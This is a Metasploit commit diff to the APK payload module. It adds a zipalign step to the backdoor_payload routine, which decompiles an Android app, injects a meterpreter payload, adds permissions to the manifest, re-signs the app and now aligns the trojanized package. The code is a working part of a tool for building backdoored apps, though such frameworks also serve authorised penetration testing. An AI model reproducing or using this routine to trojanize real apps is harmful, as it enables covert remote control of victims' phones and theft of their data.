Land rapid7#7378, run zipalign during apk injection process

timwr · timwr · commit e628fab86e81 · 2016-09-30T12:27:27.000+08:00
diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb
@@ -131,6 +131,11 @@ def backdoor_payload(apkfile, raw_payload)
       raise RuntimeError, "jarsigner not found. If it's not in your PATH, please add it."
     end
 
+    zipalign = run_cmd("zipalign")
+    unless zipalign != nil
+      raise RuntimeError, "zipalign not found. If it's not in your PATH, please add it."
+    end
+
     apktool = run_cmd("apktool -version")
     unless apktool != nil
       raise RuntimeError, "apktool not found. If it's not in your PATH, please add it."
@@ -199,15 +204,18 @@ def backdoor_payload(apkfile, raw_payload)
     print_status "Loading #{smalifile} and injecting payload..\n"
     File.open(smalifile, "wb") {|file| file.puts hookedsmali }
     injected_apk = "#{tempdir}/output.apk"
+    aligned_apk = "#{tempdir}/aligned.apk"
     print_status "Poisoning the manifest with meterpreter permissions..\n"
     fix_manifest(tempdir)
 
     print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"
     run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")
     print_status "Signing #{injected_apk}\n"
     run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey")
+    print_status "Aligning #{injected_apk}\n"
+    run_cmd("zipalign 4 #{injected_apk} #{aligned_apk}")
 
-    outputapk = File.read(injected_apk)
+    outputapk = File.read(aligned_apk)
 
     FileUtils.remove_entry tempdir
     outputapk
